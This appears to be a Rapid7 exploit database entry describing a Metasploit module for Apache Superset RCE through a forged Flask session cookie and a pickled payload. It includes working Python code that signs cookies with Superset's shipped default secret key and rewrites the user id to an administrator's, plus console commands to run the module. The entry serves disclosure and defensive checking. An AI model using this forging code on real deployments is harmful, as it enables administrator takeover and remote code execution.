Rapid7 Vulnerability & Exploit Database

Apache Superset Signed Cookie RCE

Disclosed
09/06/2023
Created
10/13/2023

Description

Apache Superset versions <= 2.0.0 ship with Flask configured to use a well-known default SECRET_KEY, and Flask signs its session cookie with that key. Anyone who knows the key can therefore forge session cookies. A user who is able to log in to the site obtains a session cookie, decodes it, replaces the stored user_id with that of an administrator, and re-signs it with the default key; the server accepts the forged cookie as a valid session for the targeted user. With administrative access, the module mounts Superset's own metadata database as a data source and pulls the stored credentials from it. It then creates a dashboard and, through Superset's database, sets a pickled Python payload for that dashboard; when Superset unpickles it, the payload executes and yields RCE. During the cleanup phase the module attempts to restore ALL of the dashboard key/value entries it touched to their previous values.
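The cookie-forging step above, as an added example that is not the Metasploit module's code. It reimplements with the standard library the construction Flask uses for its session cookie (itsdangerous URLSafeTimedSerializer, salt "cookie-session", HMAC key derivation, SHA-1, optional zlib compression), so cookies it produces are interchangeable with Flask's. The same routine doubles as the defender's check: if a cookie from your deployment verifies under a known default key, the key was never changed. Assumptions: the Flask-Login user id is stored as a string under "_user_id" (or "user_id" on older Flask-Login), the administrator's id is 1, and the candidate-key list is constructed here with only its first entry being Superset's shipped default.

```python
import base64
import hashlib
import hmac
import json
import time
import zlib
from typing import Optional

SALT = b"cookie-session"  # Flask's SecureCookieSessionInterface.salt

KNOWN_DEFAULT_KEYS = [
    # Superset config.py default; "\e", "\y", "\h" are not Python escapes, so
    # the shipped string keeps the literal backslashes.
    b"\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h",
    # Constructed placeholder: a real check appends other documented defaults here.
    b"example-placeholder-key",
]


def _b64e(data: bytes) -> bytes:
    # itsdangerous base64: URL-safe, padding stripped
    return base64.urlsafe_b64encode(data).rstrip(b"=")


def _b64d(data: bytes) -> bytes:
    return base64.urlsafe_b64decode(data + b"=" * (-len(data) % 4))


def _signature(secret: bytes, value: bytes) -> bytes:
    # Flask passes key_derivation="hmac": signing key = HMAC-SHA1(secret, salt),
    # then signature = HMAC-SHA1(signing key, value).
    derived = hmac.new(secret, SALT, hashlib.sha1).digest()
    return _b64e(hmac.new(derived, value, hashlib.sha1).digest())


def sign_session(secret: bytes, data: dict, timestamp: Optional[int] = None) -> str:
    """Build a Flask session cookie: <payload>.<timestamp>.<signature>."""
    payload = json.dumps(data, separators=(",", ":")).encode()
    compressed = zlib.compress(payload)
    # itsdangerous compresses only when it saves space and marks that with a leading "."
    body = b"." + _b64e(compressed) if len(compressed) < len(payload) - 1 else _b64e(payload)
    ts = int(time.time()) if timestamp is None else timestamp
    value = body + b"." + _b64e(ts.to_bytes((ts.bit_length() + 7) // 8, "big"))
    return (value + b"." + _signature(secret, value)).decode()


def verify_session(secret: bytes, cookie: str) -> Optional[dict]:
    """Return the session dict if the cookie was signed with `secret`, else None.
    (Flask additionally rejects timestamps older than PERMANENT_SESSION_LIFETIME;
    a re-signed cookie carries a fresh timestamp, so that check is omitted here.)"""
    value, sep, sig = cookie.encode().rpartition(b".")
    if not sep or not hmac.compare_digest(sig, _signature(secret, value)):
        return None
    body, sep, _ts = value.rpartition(b".")
    if not sep:
        return None
    payload = zlib.decompress(_b64d(body[1:])) if body.startswith(b".") else _b64d(body)
    return json.loads(payload)


def find_signing_key(cookie: str, candidates=KNOWN_DEFAULT_KEYS) -> Optional[bytes]:
    """Defender's check and attacker's first step: which known default key, if any, signed this?"""
    for key in candidates:
        if verify_session(key, cookie) is not None:
            return key
    return None


def forge_cookie(cookie: str, secret: bytes, target_user_id: str = "1") -> str:
    """Decode a cookie signed with `secret`, swap the user id, and re-sign it."""
    session = verify_session(secret, cookie)
    if session is None:
        raise ValueError("cookie was not signed with the supplied key")
    # Flask-Login >= 0.6 stores "_user_id"; older releases used "user_id" (assumption:
    # Superset keeps the id as a string under one of these). Everything else is preserved.
    id_key = "user_id" if "user_id" in session and "_user_id" not in session else "_user_id"
    session[id_key] = str(target_user_id)
    return sign_session(secret, session)


if __name__ == "__main__":
    # Constructed sample: a low-privilege user's session as Flask-Login would issue it,
    # signed with the shipped default key.
    low_priv = sign_session(KNOWN_DEFAULT_KEYS[0], {"_fresh": True, "_user_id": "5", "locale": "en"})
    key = find_signing_key(low_priv)
    print("signed with a known default key:", key is not None)
    print(verify_session(key, forge_cookie(low_priv, key, "1")))
    # The same session under a freshly generated key fails the check: nothing to forge.
    print(find_signing_key(sign_session(b"per-deployment-random-secret", {"_user_id": "5"})))
```

Run it against a real cookie by passing the browser's `session` value to find_signing_key; a non-None result means the deployment still runs on a default key and every session on it can be rewritten.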

Author(s)

  • h00die
  • paradoxis
  • Spencer McIntyre
  • Naveen Sunkavally

Platform

Python

Architectures

python

Module Options

To display the available options, load the module within the Metasploit console and run the commands 'show options' or 'show advanced':

msf > use exploit/linux/http/apache_superset_cookie_sig_rce
msf exploit(apache_superset_cookie_sig_rce) > show targets
    ...targets...
msf exploit(apache_superset_cookie_sig_rce) > set TARGET < target-id >
msf exploit(apache_superset_cookie_sig_rce) > show options
    ...show and set options...
msf exploit(apache_superset_cookie_sig_rce) > exploit
